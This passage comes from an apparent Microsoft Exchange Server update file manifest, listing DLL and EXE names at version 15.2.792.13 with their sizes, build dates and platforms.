04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.loganalyzer.analyzers.iislog.dll| 15.2.792.13| 103,832| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.loganalyzer.analyzers.lameventlog.dll| 15.2.792.13| 31,616| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.loganalyzer.analyzers.migrationlog.dll| 15.2.792.13| 15,752| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.loganalyzer.analyzers.oabdownloadlog.dll| 15.2.792.13| 20,880| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.loganalyzer.analyzers.oauthcafelog.dll| 15.2.792.13| 16,280| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.loganalyzer.analyzers.outlookservicelog.dll| 15.2.792.13| 49,048| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.loganalyzer.analyzers.owaclientlog.dll| 15.2.792.13| 44,416| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.loganalyzer.analyzers.owalog.dll| 15.2.792.13| 38,272| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.loganalyzer.analyzers.perflog.dll| 15.2.792.13| 10,375,064| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.loganalyzer.analyzers.pfassistantlog.dll| 15.2.792.13| 29,064| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.loganalyzer.analyzers.rca.dll| 15.2.792.13| 21,392| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.loganalyzer.analyzers.restlog.dll| 15.2.792.13| 24,448| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.loganalyzer.analyzers.store.dll| 15.2.792.13| 15,256| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.loganalyzer.analyzers.transportsynchealthlog.dll| 15.2.792.13| 21,896| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.loganalyzer.core.dll| 15.2.792.13| 89,488| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.loganalyzer.extensions.auditing.dll| 15.2.792.13| 20,888| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.loganalyzer.extensions.certificatelog.dll| 15.2.792.13| 26,504| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.loganalyzer.extensions.cmdletinfralog.dll| 15.2.792.13| 21,400| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.loganalyzer.extensions.common.dll| 15.2.792.13| 28,056| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.loganalyzer.extensions.easlog.dll| 15.2.792.13| 28,552| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.loganalyzer.extensions.errordetection.dll| 15.2.792.13| 36,248| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.loganalyzer.extensions.ewslog.dll| 15.2.792.13| 16,784| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.loganalyzer.extensions.griffinperfcounter.dll| 15.2.792.13| 19,840| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.loganalyzer.extensions.groupescalationlog.dll| 15.2.792.13| 15,256| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.loganalyzer.extensions.httpproxylog.dll| 15.2.792.13| 17,304| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.loganalyzer.extensions.hxservicelog.dll| 15.2.792.13| 19,864| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.loganalyzer.extensions.iislog.dll| 15.2.792.13| 57,216| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.loganalyzer.extensions.migrationlog.dll| 15.2.792.13| 17,816| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.loganalyzer.extensions.oabdownloadlog.dll| 15.2.792.13| 18,840| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.loganalyzer.extensions.oauthcafelog.dll| 15.2.792.13| 16,280| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.loganalyzer.extensions.outlookservicelog.dll| 15.2.792.13| 17,816| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.loganalyzer.extensions.owaclientlog.dll| 15.2.792.13| 15,240| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.loganalyzer.extensions.owalog.dll| 15.2.792.13| 15,256| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.loganalyzer.extensions.perflog.dll| 15.2.792.13| 52,616| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.loganalyzer.extensions.pfassistantlog.dll| 15.2.792.13| 18,320| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.loganalyzer.extensions.rca.dll| 15.2.792.13| 34,200| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.loganalyzer.extensions.restlog.dll| 15.2.792.13| 17,304| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.loganalyzer.extensions.store.dll| 15.2.792.13| 18,840| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.loganalyzer.extensions.transportsynchealthlog.dll| 15.2.792.13| 43,416| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.loguploader.dll| 15.2.792.13| 165,256| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.loguploaderproxy.dll| 15.2.792.13| 54,656| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.mailboxassistants.assistants.dll| 15.2.792.13| 9,055,624| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.mailboxassistants.attachmentthumbnail.dll| 15.2.792.13| 33,152| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.mailboxassistants.common.dll| 15.2.792.13| 124,288| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.mailboxassistants.crimsonevents.dll| 15.2.792.13| 82,808| 04-Apr-2021| 10:05| x64 \nMicrosoft.exchange.mailboxassistants.eventlog.dll| 15.2.792.13| 14,232| 04-Apr-2021| 10:05| x64 \nMicrosoft.exchange.mailboxassistants.rightsmanagement.dll| 15.2.792.13| 30,088| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.mailboxloadbalance.dll| 15.2.792.13| 661,384| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.mailboxloadbalance.serverstrings.dll| 15.2.792.13| 63,368| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.mailboxreplicationservice.calendarsyncprovider.dll| 15.2.792.13| 175,496| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.mailboxreplicationservice.common.dll| 15.2.792.13| 2,791,832| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.mailboxreplicationservice.complianceprovider.dll| 15.2.792.13| 53,144| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.mailboxreplicationservice.contactsyncprovider.dll| 15.2.792.13| 151,944| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.mailboxreplicationservice.dll| 15.2.792.13| 966,536| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.mailboxreplicationservice.easprovider.dll| 15.2.792.13| 185,208| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.mailboxreplicationservice.eventlog.dll| 15.2.792.13| 31,640| 04-Apr-2021| 10:05| x64 \nMicrosoft.exchange.mailboxreplicationservice.googledocprovider.dll| 15.2.792.13| 39,832| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.mailboxreplicationservice.imapprovider.dll| 15.2.792.13| 105,880| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.mailboxreplicationservice.mapiprovider.dll| 15.2.792.13| 95,112| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.mailboxreplicationservice.popprovider.dll| 15.2.792.13| 43,408| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.mailboxreplicationservice.proxyclient.dll| 15.2.792.13| 18,816| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.mailboxreplicationservice.proxyservice.dll| 15.2.792.13| 172,952| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.mailboxreplicationservice.pstprovider.dll| 15.2.792.13| 102,792| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.mailboxreplicationservice.remoteprovider.dll| 15.2.792.13| 98,704| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.mailboxreplicationservice.storageprovider.dll| 15.2.792.13| 188,792| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.mailboxreplicationservice.syncprovider.dll| 15.2.792.13| 43,408| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.mailboxreplicationservice.xml.dll| 15.2.792.13| 447,384| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.mailboxreplicationservice.xrmprovider.dll| 15.2.792.13| 90,008| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.mailboxtransport.monitoring.dll| 15.2.792.13| 107,904| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.mailboxtransport.storedriveragents.dll| 15.2.792.13| 371,064| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.mailboxtransport.storedrivercommon.dll| 15.2.792.13| 193,928| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.mailboxtransport.storedriverdelivery.dll| 15.2.792.13| 552,312| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.mailboxtransport.storedriverdelivery.eventlog.dll| 15.2.792.13| 16,256| 04-Apr-2021| 10:06| x64 \nMicrosoft.exchange.mailboxtransport.submission.eventlog.dll| 15.2.792.13| 15,744| 04-Apr-2021| 10:05| x64 \nMicrosoft.exchange.mailboxtransport.submission.storedriversubmission.dll| 15.2.792.13| 321,432| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.mailboxtransport.submission.storedriversubmission.eventlog.dll| 15.2.792.13| 17,792| 04-Apr-2021| 10:07| x64 \nMicrosoft.exchange.mailboxtransport.syncdelivery.dll| 15.2.792.13| 45,464| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.mailboxtransportwatchdogservicelet.dll| 15.2.792.13| 18,320| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.mailboxtransportwatchdogservicelet.eventlog.dll| 15.2.792.13| 12,672| 04-Apr-2021| 10:07| x64 \nMicrosoft.exchange.managedlexruntime.mppgruntime.dll| 15.2.792.13| 20,888| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.management.activedirectory.dll| 15.2.792.13| 415,128| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.management.classificationdefinitions.dll| 15.2.792.13| 1,269,656| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.management.compliancepolicy.dll| 15.2.792.13| 39,296| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.management.controlpanel.basics.dll| 15.2.792.13| 433,048| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.management.controlpanel.dll| 15.2.792.13| 4,563,352| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.management.controlpanel.owaoptionstrings.dll| 15.2.792.13| 261,008| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.management.controlpanelmsg.dll| 15.2.792.13| 33,688| 04-Apr-2021| 10:04| x64 \nMicrosoft.exchange.management.deployment.analysis.dll| 15.2.792.13| 94,080| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.management.deployment.dll| 15.2.792.13| 586,112| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.management.deployment.xml.dll| 15.2.792.13| 3,543,424| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.management.detailstemplates.dll| 15.2.792.13| 67,992| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.management.dll| 15.2.792.13| 16,498,048| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.management.edge.systemmanager.dll| 15.2.792.13| 58,760| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.management.infrastructure.asynchronoustask.dll| 15.2.792.13| 23,944| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.management.jitprovisioning.dll| 15.2.792.13| 101,760| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.management.migration.dll| 15.2.792.13| 543,640| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.management.mobility.dll| 15.2.792.13| 305,048| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.management.nativeresources.dll| 15.2.792.13| 273,800| 04-Apr-2021| 10:07| x64 \nMicrosoft.exchange.management.powershell.support.dll| 15.2.792.13| 418,712| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.management.provisioning.dll| 15.2.792.13| 275,848| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.management.psdirectinvoke.dll| 15.2.792.13| 70,536| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.management.rbacdefinition.dll| 15.2.792.13| 7,873,944| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.management.recipient.dll| 15.2.792.13| 1,502,096| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.management.snapin.esm.dll| 15.2.792.13| 71,560| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.management.systemmanager.dll| 15.2.792.13| 1,249,176| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.management.transport.dll| 15.2.792.13| 1,876,880| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.managementgui.dll| 15.2.792.13| 5,366,664| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.managementmsg.dll| 15.2.792.13| 36,240| 04-Apr-2021| 10:07| x64 \nMicrosoft.exchange.mapihttpclient.dll| 15.2.792.13| 117,640| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.mapihttphandler.dll| 15.2.792.13| 209,816| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.messagesecurity.dll| 15.2.792.13| 79,768| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.messagesecurity.messagesecuritymsg.dll| 15.2.792.13| 17,280| 04-Apr-2021| 10:05| x64 \nMicrosoft.exchange.messagingpolicies.dlppolicyagent.dll| 15.2.792.13| 156,040| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.messagingpolicies.edgeagents.dll| 15.2.792.13| 65,920| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.messagingpolicies.eventlog.dll| 15.2.792.13| 30,600| 04-Apr-2021| 10:05| x64 \nMicrosoft.exchange.messagingpolicies.filtering.dll| 15.2.792.13| 58,264| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.messagingpolicies.hygienerules.dll| 15.2.792.13| 29,592| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.messagingpolicies.journalagent.dll| 15.2.792.13| 175,512| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.messagingpolicies.redirectionagent.dll| 15.2.792.13| 28,536| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.messagingpolicies.retentionpolicyagent.dll| 15.2.792.13| 75,144| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.messagingpolicies.rmsvcagent.dll| 15.2.792.13| 207,240| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.messagingpolicies.rules.dll| 15.2.792.13| 440,728| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.messagingpolicies.supervisoryreviewagent.dll| 15.2.792.13| 83,336| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.messagingpolicies.transportruleagent.dll| 15.2.792.13| 35,216| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.messagingpolicies.unifiedpolicycommon.dll| 15.2.792.13| 53,128| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.messagingpolicies.unjournalagent.dll| 15.2.792.13| 96,664| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.migration.dll| 15.2.792.13| 1,110,408| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.migrationworkflowservice.eventlog.dll| 15.2.792.13| 14,728| 04-Apr-2021| 10:07| x64 \nMicrosoft.exchange.mobiledriver.dll| 15.2.792.13| 135,560| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.monitoring.activemonitoring.local.components.dll| 15.2.792.13| 5,066,648| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.monitoring.servicecontextprovider.dll| 15.2.792.13| 19,848| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.mrsmlbconfiguration.dll| 15.2.792.13| 68,488| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.net.dll| 15.2.792.13| 5,086,088| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.net.rightsmanagement.dll| 15.2.792.13| 265,616| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.networksettings.dll| 15.2.792.13| 37,784| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.notifications.broker.eventlog.dll| 15.2.792.13| 14,216| 04-Apr-2021| 10:06| x64 \nMicrosoft.exchange.notifications.broker.exe| 15.2.792.13| 549,760| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.oabauthmodule.dll| 15.2.792.13| 22,912| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.oabrequesthandler.dll| 15.2.792.13| 106,360| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.oauth.core.dll| 15.2.792.13| 291,720| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.objectstoreclient.dll| 15.2.792.13| 17,280| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.odata.configuration.dll| 15.2.792.13| 277,896| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.odata.dll| 15.2.792.13| 2,993,544| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.officegraph.common.dll| 15.2.792.13| 90,504| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.officegraph.grain.dll| 15.2.792.13| 101,760| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.officegraph.graincow.dll| 15.2.792.13| 38,296| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.officegraph.graineventbasedassistants.dll| 15.2.792.13| 45,440| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.officegraph.grainpropagationengine.dll| 15.2.792.13| 58,248| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.officegraph.graintransactionstorage.dll| 15.2.792.13| 147,328| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.officegraph.graintransportdeliveryagent.dll| 15.2.792.13| 26,512| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.officegraph.graphstore.dll| 15.2.792.13| 184,216| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.officegraph.permailboxkeys.dll| 15.2.792.13| 26,520| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.officegraph.secondarycopyquotamanagement.dll| 15.2.792.13| 38,288| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.officegraph.secondaryshallowcopylocation.dll| 15.2.792.13| 55,704| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.officegraph.security.dll| 15.2.792.13| 147,344| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.officegraph.semanticgraph.dll| 15.2.792.13| 191,896| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.officegraph.tasklogger.dll| 15.2.792.13| 33,656| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.partitioncache.dll| 15.2.792.13| 28,032| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.passivemonitoringsettings.dll| 15.2.792.13| 32,640| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.photogarbagecollectionservicelet.dll| 15.2.792.13| 15,256| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.pop3.eventlog.dll| 15.2.792.13| 17,280| 04-Apr-2021| 10:05| x64 \nMicrosoft.exchange.pop3.eventlog.dll.fe| 15.2.792.13| 17,280| 04-Apr-2021| 10:05| Not applicable \nMicrosoft.exchange.pop3.exe| 15.2.792.13| 106,896| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.pop3.exe.fe| 15.2.792.13| 106,896| 04-Apr-2021| 10:04| Not applicable \nMicrosoft.exchange.pop3service.exe| 15.2.792.13| 24,968| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.pop3service.exe.fe| 15.2.792.13| 24,968| 04-Apr-2021| 10:05| Not applicable \nMicrosoft.exchange.popconfiguration.dl1| 15.2.792.13| 42,872| 04-Apr-2021| 10:03| Not applicable \nMicrosoft.exchange.popimap.core.dll| 15.2.792.13| 264,576| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.popimap.core.dll.fe| 15.2.792.13| 264,576| 04-Apr-2021| 10:04| Not applicable \nMicrosoft.exchange.powersharp.dll| 15.2.792.13| 358,272| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.powersharp.management.dll| 15.2.792.13| 4,166,520| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.powershell.configuration.dll| 15.2.792.13| 308,608| 04-Apr-2021| 10:07| x64 \nMicrosoft.exchange.powershell.rbachostingtools.dll| 15.2.792.13| 41,368| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.protectedservicehost.exe| 15.2.792.13| 30,592| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.protocols.fasttransfer.dll| 15.2.792.13| 137,112| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.protocols.mapi.dll| 15.2.792.13| 441,728| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.provisioning.eventlog.dll| 15.2.792.13| 14,224| 04-Apr-2021| 10:07| x64 \nMicrosoft.exchange.provisioningagent.dll| 15.2.792.13| 224,640| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.provisioningservicelet.dll| 15.2.792.13| 105,880| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.pst.dll| 15.2.792.13| 168,856| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.pst.dll.deploy| 15.2.792.13| 168,856| 04-Apr-2021| 10:04| Not applicable \nMicrosoft.exchange.pswsclient.dll| 15.2.792.13| 259,464| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.publicfolders.dll| 15.2.792.13| 72,088| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.pushnotifications.crimsonevents.dll| 15.2.792.13| 215,944| 04-Apr-2021| 10:05| x64 \nMicrosoft.exchange.pushnotifications.dll| 15.2.792.13| 106,904| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.pushnotifications.publishers.dll| 15.2.792.13| 425,864| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.pushnotifications.server.dll| 15.2.792.13| 70,536| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.query.analysis.dll| 15.2.792.13| 46,488| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.query.configuration.dll| 15.2.792.13| 215,448| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.query.core.dll| 15.2.792.13| 168,320| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.query.ranking.dll| 15.2.792.13| 343,432| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.query.retrieval.dll| 15.2.792.13| 174,464| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.query.suggestions.dll| 15.2.792.13| 95,112| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.realtimeanalyticspublisherservicelet.dll| 15.2.792.13| 127,384| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.relevance.core.dll| 15.2.792.13| 63,384| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.relevance.data.dll| 15.2.792.13| 36,744| 04-Apr-2021| 10:03| x64 \nMicrosoft.exchange.relevance.mailtagger.dll| 15.2.792.13| 17,792| 04-Apr-2021| 10:06| x64 \nMicrosoft.exchange.relevance.people.dll| 15.2.792.13| 9,666,968| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.relevance.peopleindex.dll| 15.2.792.13| 20,788,096| 04-Apr-2021| 10:03| x64 \nMicrosoft.exchange.relevance.peopleranker.dll| 15.2.792.13| 36,744| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.relevance.perm.dll| 15.2.792.13| 97,688| 04-Apr-2021| 10:03| x64 \nMicrosoft.exchange.relevance.sassuggest.dll| 15.2.792.13| 28,544| 04-Apr-2021| 10:05| x64 \nMicrosoft.exchange.relevance.upm.dll| 15.2.792.13| 72,072| 04-Apr-2021| 10:04| x64 \nMicrosoft.exchange.routing.client.dll| 15.2.792.13| 15,752| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.routing.eventlog.dll| 15.2.792.13| 13,208| 04-Apr-2021| 10:06| x64 \nMicrosoft.exchange.routing.server.exe| 15.2.792.13| 59,288| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.rpc.dll| 15.2.792.13| 1,647,496| 04-Apr-2021| 10:03| x64 \nMicrosoft.exchange.rpcclientaccess.dll| 15.2.792.13| 209,792| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.rpcclientaccess.exmonhandler.dll| 15.2.792.13| 60,312| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.rpcclientaccess.handler.dll| 15.2.792.13| 518,040| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.rpcclientaccess.monitoring.dll| 15.2.792.13| 161,160| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.rpcclientaccess.parser.dll| 15.2.792.13| 724,360| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.rpcclientaccess.server.dll| 15.2.792.13| 243,096| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.rpcclientaccess.service.eventlog.dll| 15.2.792.13| 20,872| 04-Apr-2021| 10:06| x64 \nMicrosoft.exchange.rpcclientaccess.service.exe| 15.2.792.13| 35,224| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.rpchttpmodules.dll| 15.2.792.13| 42,376| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.rpcoverhttpautoconfig.dll| 15.2.792.13| 56,216| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.rpcoverhttpautoconfig.eventlog.dll| 15.2.792.13| 27,536| 04-Apr-2021| 10:06| x64 \nMicrosoft.exchange.rules.common.dll| 15.2.792.13| 130,456| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.saclwatcher.eventlog.dll| 15.2.792.13| 14,720| 04-Apr-2021| 10:06| x64 \nMicrosoft.exchange.saclwatcherservicelet.dll| 15.2.792.13| 20,344| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.safehtml.dll| 15.2.792.13| 21,400| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.sandbox.activities.dll| 15.2.792.13| 267,648| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.sandbox.contacts.dll| 15.2.792.13| 110,976| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.sandbox.core.dll| 15.2.792.13| 112,536| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.sandbox.services.dll| 15.2.792.13| 622,472| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.search.bigfunnel.dll| 15.2.792.13| 185,224| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.search.bigfunnel.eventlog.dll| 15.2.792.13| 12,160| 04-Apr-2021| 10:06| x64 \nMicrosoft.exchange.search.blingwrapper.dll| 15.2.792.13| 19,328| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.search.core.dll| 15.2.792.13| 211,840| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.search.ediscoveryquery.dll| 15.2.792.13| 17,808| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.search.engine.dll| 15.2.792.13| 97,664| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.search.fast.configuration.dll| 15.2.792.13| 16,792| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.search.fast.dll| 15.2.792.13| 436,624| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.search.files.dll| 15.2.792.13| 274,296| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.search.flighting.dll| 15.2.792.13| 24,968| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.search.mdb.dll| 15.2.792.13| 217,992| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.search.service.exe| 15.2.792.13| 26,488| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.security.applicationencryption.dll| 15.2.792.13| 221,080| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.security.dll| 15.2.792.13| 1,559,944| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.security.msarpsservice.exe| 15.2.792.13| 19,856| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.security.securitymsg.dll| 15.2.792.13| 28,536| 04-Apr-2021| 10:06| x64 \nMicrosoft.exchange.server.storage.admininterface.dll| 15.2.792.13| 225,176| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.server.storage.common.dll| 15.2.792.13| 5,151,112| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.server.storage.diagnostics.dll| 15.2.792.13| 214,920| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.server.storage.directoryservices.dll| 15.2.792.13| 115,608| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.server.storage.esebackinterop.dll| 15.2.792.13| 82,824| 04-Apr-2021| 10:07| x64 \nMicrosoft.exchange.server.storage.eventlog.dll| 15.2.792.13| 80,768| 04-Apr-2021| 10:05| x64 \nMicrosoft.exchange.server.storage.fulltextindex.dll| 15.2.792.13| 66,440| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.server.storage.ha.dll| 15.2.792.13| 81,304| 04-Apr-2021| 10:06| 